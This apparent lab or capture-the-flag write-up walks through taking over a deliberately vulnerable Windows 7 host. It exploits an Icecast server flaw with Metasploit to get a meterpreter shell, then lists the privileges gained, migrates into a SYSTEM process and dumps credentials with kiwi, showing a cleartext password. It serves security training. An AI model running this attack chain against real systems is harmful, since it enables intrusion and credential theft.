Professional Documents
Culture Documents
Goal
Hack into a Windows machine, exploiting a very poorly secured media server.
Recon
Lets run nmap on the victim to find the running services and open ports.
Gain Access
The victim is running a Icecast Media server which has a known vulnerability CVE-2004-1561
and is of type Execute Code Overflow vulnerability.
Using this vulnerability exploit the victim and using metasploit to gain the reverse shell.
Matching Modules================
# Name Disclosure Date Rank Check
Description
- ---- --------------- ---- ----- ---
--------
0 exploit/windows/http/icecast_header 2004-09-28 great No
Icecast Header Overwrite
Exploit target:
Id Name
-- ----
0 Automatic
We have successfully exploited the victim and gained a meterpreter shell, with the user
dark-pc\dark.
The remote machine is running on Windows 7 - Build 7601 and of 64-Bit architecture.
By running a local exploit suggester from meterpreter, it suggested the victim is vulnerable to
nine known vulnerabilities.
Exploit target:
Id Name
-- ----
0 Windows x86
The exploit ran successfully and we can also see the privileges by running the getprivs.
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter >
meterpreter > ps
1256 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
C:\Windows\System32\spoolsv.exe
meterpreter > migrate 1256
Looting Credentials
Loading the kiwi extension into the meterpreter, lets extract the passwords of the victim with the
option creds_all.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
wdigest credentials
===================
tspkg credentials
=================
kerberos credentials
====================
We have successfully extracted the available credentials and the user Dark password is
Password01!.
Post Exploitation